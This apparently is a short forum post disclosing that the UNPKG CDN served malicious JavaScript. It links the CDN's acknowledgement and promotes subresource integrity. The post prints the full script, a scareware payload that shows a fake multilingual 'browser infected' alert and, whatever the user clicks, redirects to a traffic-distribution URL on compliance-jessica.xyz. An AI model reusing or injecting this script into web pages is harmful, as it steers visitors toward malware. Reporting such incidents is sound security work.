UNPKG CDN Serving Malware

Here's the served JS for reference:

      var lang = navigator.languages ? navigator.languages[0] : (navigator.language || navigator.userLanguage);
    if (lang) lang = lang.substring(0, 2);
    console.log('lang: ' + lang);

    var country = 'US';

    var msg = 'Your computer is infected. You have to check it with antivirus.';

    if (lang == 'es') msg = "Su navegador contiene malware. Usted tiene que instalar la herramienta de eliminación de malware Chrome.";
    if (lang == 'it') msg = "Il tuo browser contiene malware. È necessario installare strumento di rimozione malware Chrome.";
    if (lang == 'fr') msg = "Votre navigateur contient MALWARE. Vous devez installer l'outil de suppression de logiciels malveillants Chrome.";
    if (lang == 'pt') msg = "Seu navegador contém malware. Você tem que instalar o Ferramenta de remoção Chrome Malware.";
    if (lang == 'de') msg = "Ihr Browser enthält MALWARE. Sie müssen Chrome Malware Removal Tool zu installieren.";
    if (lang == 'ru') msg = "Ваш браузер содержит вредоносный код. Вы должны установить расширение для блокировки вредоносного кода.";
    if (lang == 'gr') msg = "Το πρόγραμμα περιήγησής σας περιέχει κακόβουλο λογισμικό. Θα πρέπει να εγκαταστήσετε το Chrome Malware εργαλείο αφαίρεσης.";

    if (confirm(msg)) {
        window.top.location.href = 'http://compliance-jessica.xyz/tds.php?subid=alertyes' + country + lang;
    } else {
        window.top.location.href = 'http://compliance-jessica.xyz/tds.php?subid=alertno' + country + lang;
    }

They've acknowledged the issue: https://twitter.com/unpkg/status/852655106562564098

Edit: This is why subresource integrity is important! https://hacks.mozilla.org/2015/09/subresource-integrity-in-f...